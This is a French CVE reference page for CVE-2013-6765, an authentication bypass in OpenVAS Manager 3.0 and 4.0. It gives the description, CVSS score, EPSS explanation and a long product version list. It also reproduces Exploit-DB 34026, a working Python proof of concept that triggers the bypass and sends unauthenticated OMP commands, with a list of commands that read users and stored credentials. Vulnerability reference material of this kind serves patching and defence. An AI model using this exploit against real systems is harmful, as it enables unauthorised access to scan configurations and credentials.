CVE-2013-6765
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
OpenVAS Manager 3.0 before 3.0.7 and 4.0 before 4.0.4 allows remote attackers to bypass the OMP authentication restrictions and execute OMP commands via a crafted OMP request for version information, which causes the state to be set to CLIENT_AUTHENTIC, as demonstrated by the omp_xml_handle_end_element function in omp.c.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Authentication When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 34026
Date de publication : 2014-07-09 22h00 +00:00
Auteur : EccE
EDB Vérifié : No
#!/usr/bin/python
# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC
# Date: 09/07/2014
# Exploit Author: EccE
# Vendor Homepage: http://www.openvas.org/
# Software Link: http://wald.intevation.org/frs/?group_id=29
# Version: OpenVAS Manager 4.0
# Tested on: Debian GNU/Linux testing (jessie)
# CVE : CVE-2013-6765
"""
Small list of working commands
get_agents
get_configs
get_alerts
get_filters
get_lsc_credentials
get_notes
get_nvts
get_targets
get_users
get_schedules
More commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though.
As designed in OMP protocol, commands must be sent this way : <COMMAND/>
"""
import socket, ssl
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Require a certificate from the server. We used a self-signed certificate
# so here cacerts.pem must be the server certificate itself.
ssl_sock = ssl.wrap_socket(s,
ca_certs="/var/lib/openvas/CA/cacert.pem",
cert_reqs=ssl.CERT_REQUIRED)
# OpenVAS Manager listen by default on localhost tcp/9390
ssl_sock.connect(('localhost', 9390))
print "#################################################################"
print "# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #"
print "#################################################################"
print "\n"
print "--> Retrieving version...(exploiting the bug !)\n"
ssl_sock.write("<get_version/>")
data = ssl_sock.read()
print data
print "\n"
print "--> Retrieving slaves...\n"
ssl_sock.write("<get_slaves/>")
tasks = ssl_sock.read()
print tasks
print "\n"
"""
print "--> Creating note...\n"
ssl_sock.write("<create_note/>")
note = ssl_sock.read()
print note
print "--> Retrieving users list...\n"
ssl_sock.write("<get_users/>")
users_list = ssl_sock.read()
print users_list
"""
ssl_sock.close()
Products Mentioned
Configuraton 0
Openvas>>Openvas_manager >> Version 4.0
- Openvas>>Openvas_manager >> Version 4.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 4.0
- Openvas>>Openvas_manager >> Version 4.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 4.0
- Openvas>>Openvas_manager >> Version 4.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 4.0
- Openvas>>Openvas_manager >> Version 4.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 4.0
- Openvas>>Openvas_manager >> Version 4.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 4.0
- Openvas>>Openvas_manager >> Version 4.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 4.0.0
- Openvas>>Openvas_manager >> Version 4.0.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 4.0.1
- Openvas>>Openvas_manager >> Version 4.0.1 (Open CPE detail)
Openvas>>Openvas_manager >> Version 4.0.2
- Openvas>>Openvas_manager >> Version 4.0.2 (Open CPE detail)
Openvas>>Openvas_manager >> Version 4.0.3
- Openvas>>Openvas_manager >> Version 4.0.3 (Open CPE detail)
Configuraton 0
Openvas>>Openvas_manager >> Version 3.0
- Openvas>>Openvas_manager >> Version 3.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0
- Openvas>>Openvas_manager >> Version 3.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0
- Openvas>>Openvas_manager >> Version 3.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0
- Openvas>>Openvas_manager >> Version 3.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0
- Openvas>>Openvas_manager >> Version 3.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0
- Openvas>>Openvas_manager >> Version 3.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0
- Openvas>>Openvas_manager >> Version 3.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0
- Openvas>>Openvas_manager >> Version 3.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0
- Openvas>>Openvas_manager >> Version 3.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0.0
- Openvas>>Openvas_manager >> Version 3.0.0 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0.1
- Openvas>>Openvas_manager >> Version 3.0.1 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0.2
- Openvas>>Openvas_manager >> Version 3.0.2 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0.3
- Openvas>>Openvas_manager >> Version 3.0.3 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0.4
- Openvas>>Openvas_manager >> Version 3.0.4 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0.5
- Openvas>>Openvas_manager >> Version 3.0.5 (Open CPE detail)
Openvas>>Openvas_manager >> Version 3.0.6
- Openvas>>Openvas_manager >> Version 3.0.6 (Open CPE detail)
Références
http://lists.wald.intevation.org/pipermail/openvas-announce/2013-November/000157.html
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
